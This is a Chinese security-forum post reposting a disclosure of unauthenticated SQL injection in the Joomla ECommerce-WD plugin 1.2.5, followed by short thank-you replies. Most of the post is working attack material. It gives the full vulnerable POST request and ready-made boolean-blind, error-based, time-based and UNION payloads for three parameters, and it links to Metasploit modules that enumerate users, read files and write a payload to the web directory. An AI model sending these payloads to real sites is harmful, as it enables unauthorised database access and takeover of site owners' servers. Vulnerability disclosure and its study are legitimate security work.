查看: 27177|回复: 38

Joomla ECommerce-WD Plugin 1.2.5 - SQL Injection

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-3-20 19:52:41 | 显示全部楼层 |阅读模式
    [Python] 纯文本查看 复制代码
    Version 1.2.5 of the ECommerce-WD plugin for Joomla! has multiple
    unauthenticated SQL injections available via the advanced search
    functionality.
      
    [url]http://extensions.joomla.org/extension/ecommerce-wd[/url]
      
    The vulnerable parameters are search_category_id, sort_order, and
    filter_manufacturer_ids within the following request:
      
    POST
    /index.php?option=com_ecommercewd&controller=products&task=displayproducts
    HTTP/1.1
    Host: 172.31.16.49
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101
    Firefox/30.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer:
    [url]http://172.31.16.49/index.php?option=com_ecommercewd&view=products&layout=displayproducts&Itemid=120[/url]
    Cookie: 78fdafa5595397a1fc885bb2f0d74010=q1q1ud2sr0la18o5b38mkbdak2
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 321
      
    product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
      
      
    Vectors:
      
    Parameter: filter_manufacturer_ids (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload:
    product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
    AND 8066=8066 AND
    (7678=7678&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
      
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
    BY clause
        Payload:
    product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
    AND (SELECT 7197 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT
    (ELT(7197=7197,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
    (1212=1212&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
      
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind (SELECT)
        Payload:
    product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
    AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND
    (1480=1480&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
      
      
      
    Parameter: search_category_id (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload:
    product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
    AND 3039=3039 AND
    (6271=6271&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
      
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
    BY clause
        Payload:
    product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
    AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT
    (ELT(5158=5158,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
    (8257=8257&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
      
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind (SELECT)
        Payload:
    product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
    AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND
    (1251=1251&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
      
        Type: UNION query
        Title: Generic UNION query (NULL) - 1 column
        Payload:
    product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
    UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x71706a6a71)--
    &filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
      
      
      
    Parameter: sort_order (POST)
        Type: boolean-based blind
        Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
        Payload:
    product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc,(SELECT
    (CASE WHEN (8973=8973) THEN 1 ELSE 8973*(SELECT 8973 FROM
    INFORMATION_SCHEMA.CHARACTER_SETS)
    END))&pagination_limit_start=0&pagination_limit=12
      
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.11 time-based blind - ORDER BY, GROUP BY clause
        Payload:
    product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc,(SELECT
    (CASE WHEN (6064=6064) THEN SLEEP(5) ELSE 6064*(SELECT 6064 FROM
    INFORMATION_SCHEMA.CHARACTER_SETS)
    END))&pagination_limit_start=0&pagination_limit=12
      
      
    Metasploit modules that exploit the UNION-based injection are available on
    ExploitHub:
      
    Enumerate users --
    [url]https://exploithub.com/joomla-e-commerce-wd-plugin-users-enumeration-via-sql-injection.html[/url]
    Read files --
    [url]https://exploithub.com/joomla-e-commerce-wd-plugin-file-download-via-sql-injection.html[/url]
    Write payload to web directory --
    [url]https://exploithub.com/joomla-e-commerce-wd-plugin-sql-injection.html[/url]
      
    -- 
    [url]http://volatile-minds.blogspot.com[/url] -- blog
    [url]http://www.volatileminds.net[/url] -- website
    #
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2022-10-21 10:32
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2015-6-28 05:51:44 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 18:11:37 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 19:05:01 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 21:03:30 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 19:05:54 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 16:44:23 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-3 00:30:50 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-7-3 05:03:16 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-3 14:11:09 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-24 21:16 , Processed in 0.036794 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部